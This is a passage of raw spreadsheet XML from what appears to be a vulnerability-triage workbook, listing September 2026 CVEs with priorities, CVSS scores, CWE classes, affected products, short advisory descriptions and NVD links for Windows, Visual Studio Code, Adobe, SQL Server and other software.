r="D306" s="5" t="n"><v>8.4</v></c><c r="E306" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F306" s="5" t="inlineStr"><is><t>9119a7d8-5eab-497f-8521-727c672e3725</t></is></c><c r="G306" s="5" t="inlineStr" /><c r="H306" s="5" t="n"><v>0.001</v></c><c r="I306" s="5" t="inlineStr" /><c r="J306" s="5" t="inlineStr" /><c r="K306" s="5" t="inlineStr" /><c r="L306" s="5" t="inlineStr" /><c r="M306" s="5" t="inlineStr" /><c r="N306" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O306" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P306" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q306" s="5" t="inlineStr" /><c r="R306" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S306" s="5" t="inlineStr"><is><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is></c><c r="T306" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86819</t></is></c></row><row r="307"><c r="A307" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B307" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C307" s="5" t="inlineStr"><is><t>CVE-2026-19203</t></is></c><c r="D307" s="5" t="n"><v>8.300000000000001</v></c><c r="E307" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F307" s="5" t="inlineStr"><is><t>emo@eclipse.org</t></is></c><c r="G307" s="5" t="inlineStr" /><c r="H307" s="5" t="n"><v>0.003</v></c><c r="I307" s="5" t="inlineStr" /><c r="J307" s="5" t="inlineStr" /><c r="K307" s="5" t="inlineStr" /><c r="L307" s="5" t="inlineStr" /><c r="M307" s="5" t="inlineStr" /><c r="N307" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O307" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P307" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q307" s="5" t="inlineStr" /><c r="R307" s="5" t="inlineStr"><is><t>CWE-444</t></is></c><c r="S307" s="5" t="inlineStr"><is><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is></c><c r="T307" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19203</t></is></c></row><row r="308"><c r="A308" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B308" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C308" s="5" t="inlineStr"><is><t>CVE-2026-69646</t></is></c><c r="D308" s="5" t="n"><v>8.300000000000001</v></c><c r="E308" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F308" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G308" s="5" t="inlineStr" /><c r="H308" s="5" t="n"><v>0.002</v></c><c r="I308" s="5" t="inlineStr" /><c r="J308" s="5" t="inlineStr" /><c r="K308" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L308" s="5" t="inlineStr" /><c r="M308" s="5" t="inlineStr" /><c r="N308" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O308" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P308" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q308" s="5" t="inlineStr" /><c r="R308" s="5" t="inlineStr"><is><t>CWE-347</t></is></c><c r="S308" s="5" t="inlineStr"><is><t>Improper verification of cryptographic signature in Skype for Business allows an unauthorized attacker to perform spoofing over an adjacent network.</t></is></c><c r="T308" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69646</t></is></c></row><row r="309"><c r="A309" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B309" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C309" s="5" t="inlineStr"><is><t>CVE-2026-81821</t></is></c><c r="D309" s="5" t="n"><v>8.300000000000001</v></c><c r="E309" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F309" s="5" t="inlineStr"><is><t>ics-cert@hq.dhs.gov</t></is></c><c r="G309" s="5" t="inlineStr" /><c r="H309" s="5" t="n"><v>0.001</v></c><c r="I309" s="5" t="inlineStr" /><c r="J309" s="5" t="inlineStr" /><c r="K309" s="5" t="inlineStr" /><c r="L309" s="5" t="inlineStr" /><c r="M309" s="5" t="inlineStr" /><c r="N309" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O309" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P309" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q309" s="5" t="inlineStr" /><c r="R309" s="5" t="inlineStr"><is><t>CWE-321</t></is></c><c r="S309" s="5" t="inlineStr"><is><t>The vulnerability, if exploited, could allow a miscreant with read access to PIMBoards project files to decrypt and view sensitive information.</t></is></c><c r="T309" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81821</t></is></c></row><row r="310"><c r="A310" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B310" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C310" s="5" t="inlineStr"><is><t>CVE-2026-81822</t></is></c><c r="D310" s="5" t="n"><v>8.300000000000001</v></c><c r="E310" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F310" s="5" t="inlineStr"><is><t>ics-cert@hq.dhs.gov</t></is></c><c r="G310" s="5" t="inlineStr" /><c r="H310" s="5" t="n"><v>0.001</v></c><c r="I310" s="5" t="inlineStr" /><c r="J310" s="5" t="inlineStr" /><c r="K310" s="5" t="inlineStr" /><c r="L310" s="5" t="inlineStr" /><c r="M310" s="5" t="inlineStr" /><c r="N310" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O310" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P310" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q310" s="5" t="inlineStr" /><c r="R310" s="5" t="inlineStr"><is><t>CWE-327</t></is></c><c r="S310" s="5" t="inlineStr"><is><t>The vulnerability, if exploited, could allow a miscreant with read access to PIMBoards project files to reverse engineer PIMBoards users’ app-native passwords through computational brute-forcing of weak hashes, potentially allowing elevation to a PIMBoards administrator user.</t></is></c><c r="T310" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81822</t></is></c></row><row r="311"><c r="A311" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B311" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C311" s="5" t="inlineStr"><is><t>CVE-2026-69846</t></is></c><c r="D311" s="5" t="n"><v>8.199999999999999</v></c><c r="E311" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F311" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G311" s="5" t="inlineStr" /><c r="H311" s="5" t="n"><v>0.003</v></c><c r="I311" s="5" t="inlineStr" /><c r="J311" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K31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11" s="5" t="inlineStr" /><c r="M311" s="5" t="inlineStr" /><c r="N311" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O311" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P311" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q311" s="5" t="inlineStr" /><c r="R311" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S311" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T311" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69846</t></is></c></row><row r="312"><c r="A312" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B312" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C312" s="5" t="inlineStr"><is><t>CVE-2026-69906</t></is></c><c r="D312" s="5" t="n"><v>8.199999999999999</v></c><c r="E312" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F312" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G312" s="5" t="inlineStr" /><c r="H312" s="5" t="n"><v>0.003</v></c><c r="I312" s="5" t="inlineStr" /><c r="J312" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K31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12" s="5" t="inlineStr" /><c r="M312" s="5" t="inlineStr" /><c r="N312" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O312" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P312" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q312" s="5" t="inlineStr" /><c r="R312" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S312" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T312" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69906</t></is></c></row><row r="313"><c r="A313" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B313" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C313" s="5" t="inlineStr"><is><t>CVE-2026-72958</t></is></c><c r="D313" s="5" t="n"><v>8.199999999999999</v></c><c r="E313" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F313" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G313" s="5" t="inlineStr" /><c r="H313" s="5" t="n"><v>0.003</v></c><c r="I313" s="5" t="inlineStr" /><c r="J313" s="5" t="inlineStr" /><c r="K313" s="5" t="inlineStr" /><c r="L313" s="5" t="inlineStr" /><c r="M313" s="5" t="inlineStr" /><c r="N313" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O313" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P313" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q313" s="5" t="inlineStr" /><c r="R313" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S313" s="5" t="inlineStr"><is><t>Double free in Windows Credential Guard allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T313" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72958</t></is></c></row><row r="314"><c r="A314" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B314" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C314" s="5" t="inlineStr"><is><t>CVE-2026-72961</t></is></c><c r="D314" s="5" t="n"><v>8.199999999999999</v></c><c r="E314" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F314" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G314" s="5" t="inlineStr" /><c r="H314" s="5" t="n"><v>0.003</v></c><c r="I314" s="5" t="inlineStr" /><c r="J314" s="5" t="inlineStr" /><c r="K314" s="5" t="inlineStr" /><c r="L314" s="5" t="inlineStr" /><c r="M314" s="5" t="inlineStr" /><c r="N314" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O314" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P314" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q314" s="5" t="inlineStr" /><c r="R314" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S314" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Hyper-V allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T314" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72961</t></is></c></row><row r="315"><c r="A315" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B315" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C315" s="5" t="inlineStr"><is><t>CVE-2026-72962</t></is></c><c r="D315" s="5" t="n"><v>8.199999999999999</v></c><c r="E315" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F315" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G315" s="5" t="inlineStr" /><c r="H315" s="5" t="n"><v>0.003</v></c><c r="I315" s="5" t="inlineStr" /><c r="J315" s="5" t="inlineStr" /><c r="K315" s="5" t="inlineStr" /><c r="L315" s="5" t="inlineStr" /><c r="M315" s="5" t="inlineStr" /><c r="N315" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O315" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P315" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q315" s="5" t="inlineStr" /><c r="R315" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S315" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T315" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72962</t></is></c></row><row r="316"><c r="A316" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B316" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C316" s="5" t="inlineStr"><is><t>CVE-2026-76191</t></is></c><c r="D316" s="5" t="n"><v>8.199999999999999</v></c><c r="E316" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F316" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G316" s="5" t="inlineStr" /><c r="H316" s="5" t="n"><v>0.003</v></c><c r="I316" s="5" t="inlineStr" /><c r="J316" s="5" t="inlineStr" /><c r="K316" s="5" t="inlineStr"><is><t>adobe:animate, apple:macos, microsoft:windows</t></is></c><c r="L316" s="5" t="inlineStr" /><c r="M316" s="5" t="inlineStr" /><c r="N316" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O316" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P316" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q316" s="5" t="inlineStr" /><c r="R316" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S316" s="5" t="inlineStr"><is><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is></c><c r="T316" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76191</t></is></c></row><row r="317"><c r="A317" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B317" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C317" s="5" t="inlineStr"><is><t>CVE-2026-76202</t></is></c><c r="D317" s="5" t="n"><v>8.199999999999999</v></c><c r="E317" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F317" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G317" s="5" t="inlineStr" /><c r="H317" s="5" t="n"><v>0.004</v></c><c r="I317" s="5" t="inlineStr" /><c r="J317" s="5" t="inlineStr" /><c r="K317" s="5" t="inlineStr"><is><t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t></is></c><c r="L317" s="5" t="inlineStr" /><c r="M317" s="5" t="inlineStr" /><c r="N317" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O317" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P317" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q317" s="5" t="inlineStr" /><c r="R317" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S317"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T317" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76202</t></is></c></row><row r="318"><c r="A318" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B318" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C318" s="5" t="inlineStr"><is><t>CVE-2026-77097</t></is></c><c r="D318" s="5" t="n"><v>8.199999999999999</v></c><c r="E318" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F318" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G318" s="5" t="inlineStr" /><c r="H318" s="5" t="n"><v>0.003</v></c><c r="I318" s="5" t="inlineStr" /><c r="J318" s="5" t="inlineStr" /><c r="K318" s="5" t="inlineStr"><is><t>commvault:commvault</t></is></c><c r="L318" s="5" t="inlineStr" /><c r="M318" s="5" t="inlineStr" /><c r="N318" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O318" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P318" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q318" s="5" t="inlineStr" /><c r="R318" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S318" s="5" t="inlineStr"><is><t>Private Metrics Server contained a missing authentication condition affecting metrics upload functionality and service availability. Software customers upgrade to resolved maintenance release. Update Private Metrics Server.</t></is></c><c r="T318" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77097</t></is></c></row><row r="319"><c r="A319" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B319" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C319" s="5" t="inlineStr"><is><t>CVE-2026-77968</t></is></c><c r="D319" s="5" t="n"><v>8.199999999999999</v></c><c r="E319" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F319" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G319" s="5" t="inlineStr" /><c r="H319" s="5" t="n"><v>0.002</v></c><c r="I319" s="5" t="inlineStr" /><c r="J319" s="5" t="inlineStr" /><c r="K319" s="5" t="inlineStr" /><c r="L319" s="5" t="inlineStr" /><c r="M319" s="5" t="inlineStr" /><c r="N319" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O319" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P319" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q319" s="5" t="inlineStr" /><c r="R319" s="5" t="inlineStr"><is><t>CWE-269</t></is></c><c r="S319" s="5" t="inlineStr"><is><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is></c><c r="T319" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77968</t></is></c></row><row r="320"><c r="A320" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B320" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C320" s="5" t="inlineStr"><is><t>CVE-2026-81354</t></is></c><c r="D320" s="5" t="n"><v>8.199999999999999</v></c><c r="E320" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F320" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G320" s="5" t="inlineStr" /><c r="H320" s="5" t="n"><v>0.002</v></c><c r="I320" s="5" t="inlineStr" /><c r="J320" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K320" s="5" t="inlineStr"><is><t>microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2019</t></is></c><c r="L320" s="5" t="inlineStr" /><c r="M320" s="5" t="inlineStr" /><c r="N320" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O320" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P320" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q320" s="5" t="inlineStr" /><c r="R320" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S320" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Hello allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T320" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81354</t></is></c></row><row r="321"><c r="A321" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B321" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C321" s="5" t="inlineStr"><is><t>CVE-2026-81356</t></is></c><c r="D321" s="5" t="n"><v>8.199999999999999</v></c><c r="E321" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F321" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G321" s="5" t="inlineStr" /><c r="H321" s="5" t="n"><v>0.003</v></c><c r="I321" s="5" t="inlineStr" /><c r="J321" s="5" t="inlineStr" /><c r="K321" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L321" s="5" t="inlineStr" /><c r="M321" s="5" t="inlineStr" /><c r="N321" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O321" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P321" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q321" s="5" t="inlineStr" /><c r="R321" s="5" t="inlineStr"><is><t>CWE-444</t></is></c><c r="S321" s="5" t="inlineStr"><is><t>Inconsistent interpretation of http requests ('http request/response smuggling') in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T321" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81356</t></is></c></row><row r="322"><c r="A322" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B322" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C322" s="5" t="inlineStr"><is><t>CVE-2026-81357</t></is></c><c r="D322" s="5" t="n"><v>8.199999999999999</v></c><c r="E322" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F322" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G322" s="5" t="inlineStr" /><c r="H322" s="5" t="n"><v>0.003</v></c><c r="I322" s="5" t="inlineStr" /><c r="J322" s="5" t="inlineStr" /><c r="K322" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L322" s="5" t="inlineStr" /><c r="M322" s="5" t="inlineStr" /><c r="N322" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O322" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P322" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q322" s="5" t="inlineStr" /><c r="R322" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S322" s="5" t="inlineStr"><is><t>Server-side request forgery (ssrf) in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T322" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81357</t></is></c></row><row r="323"><c r="A323" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B323" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C323" s="5" t="inlineStr"><is><t>CVE-2026-81378</t></is></c><c r="D323" s="5" t="n"><v>8.199999999999999</v></c><c r="E323" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F323" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G323" s="5" t="inlineStr" /><c r="H323" s="5" t="n"><v>0.003</v></c><c r="I323" s="5" t="inlineStr" /><c r="J323" s="5" t="inlineStr" /><c r="K323" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L323" s="5" t="inlineStr" /><c r="M323" s="5" t="inlineStr" /><c r="N323" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O323" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P323" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q323" s="5" t="inlineStr" /><c r="R323" s="5" t="inlineStr"><is><t>CWE-436</t></is></c><c r="S323" s="5" t="inlineStr"><is><t>Interpretation conflict in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T323" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81378</t></is></c></row><row r="324"><c r="A324" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B324" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C324" s="5" t="inlineStr"><is><t>CVE-2026-81379</t></is></c><c r="D324" s="5" t="n"><v>8.199999999999999</v></c><c r="E324" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F324" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G324" s="5" t="inlineStr" /><c r="H324" s="5" t="n"><v>0.003</v></c><c r="I324" s="5" t="inlineStr" /><c r="J324" s="5" t="inlineStr" /><c r="K324" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L324" s="5" t="inlineStr" /><c r="M324" s="5" t="inlineStr" /><c r="N324" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O324" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P324" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q324" s="5" t="inlineStr" /><c r="R324" s="5" t="inlineStr"><is><t>CWE-636</t></is></c><c r="S324" s="5" t="inlineStr"><is><t>Not failing securely ('failing open') in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T324" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81379</t></is></c></row><row r="325"><c r="A325" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B325" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C325" s="5" t="inlineStr"><is><t>CVE-2026-83939</t></is></c><c r="D325" s="5" t="n"><v>8.199999999999999</v></c><c r="E325" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F325" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G325" s="5" t="inlineStr" /><c r="H325" s="5" t="n"><v>0.003</v></c><c r="I325" s="5" t="inlineStr" /><c r="J325" s="5" t="inlineStr" /><c r="K325" s="5" t="inlineStr"><is><t>microsoft:windows_11_26h1</t></is></c><c r="L325" s="5" t="inlineStr" /><c r="M325" s="5" t="inlineStr" /><c r="N325" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O325" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P325" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q325" s="5" t="inlineStr" /><c r="R325" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S325" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T325" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83939</t></is></c></row><row r="326"><c r="A326" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B326" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C326" s="5" t="inlineStr"><is><t>CVE-2026-86600</t></is></c><c r="D326" s="5" t="n"><v>8.199999999999999</v></c><c r="E326" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F326" s="5" t="inlineStr"><is><t>412d305a-227d-44f9-a262-a31ba44f2aea</t></is></c><c r="G326" s="5" t="inlineStr" /><c r="H326" s="5" t="n"><v>0.003</v></c><c r="I326" s="5" t="inlineStr" /><c r="J326" s="5" t="inlineStr" /><c r="K326" s="5" t="inlineStr" /><c r="L326" s="5" t="inlineStr" /><c r="M326" s="5" t="inlineStr" /><c r="N326" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O326" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P326" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q326" s="5" t="inlineStr" /><c r="R326" s="5" t="inlineStr"><is><t>CWE-441, CWE-522</t></is></c><c r="S326" s="5" t="inlineStr"><is><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is></c><c r="T326" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86600</t></is></c></row><row r="327"><c r="A327" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B327" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C327" s="5" t="inlineStr"><is><t>CVE-2026-47297</t></is></c><c r="D327" s="5" t="n"><v>8.1</v></c><c r="E327" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F327" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G327" s="5" t="inlineStr" /><c r="H327" s="5" t="n"><v>0.008</v></c><c r="I327" s="5" t="inlineStr" /><c r="J327" s="5" t="inlineStr" /><c r="K327" s="5" t="inlineStr" /><c r="L327" s="5" t="inlineStr" /><c r="M327" s="5" t="inlineStr" /><c r="N327" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O327" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P327" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q327" s="5" t="inlineStr" /><c r="R327" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S327" s="5" t="inlineStr"><is><t>Deserialization of untrusted data in SQL Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T327" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-47297</t></is></c></row><row r="328"><c r="A328" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B328" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C328" s="5" t="inlineStr"><is><t>CVE-2026-55007</t></is></c><c r="D328" s="5" t="n"><v>8.1</v></c><c r="E328" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F328" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G328" s="5" t="inlineStr" /><c r="H328" s="5" t="n"><v>0.007</v></c><c r="I328" s="5" t="inlineStr" /><c r="J328" s="5" t="inlineStr" /><c r="K328" s="5" t="inlineStr" /><c r="L328" s="5" t="inlineStr" /><c r="M328" s="5" t="inlineStr" /><c r="N328" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O328" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P328" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q328" s="5" t="inlineStr" /><c r="R328" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S328" s="5" t="inlineStr"><is><t>Double free in Microsoft Exchange Server allows 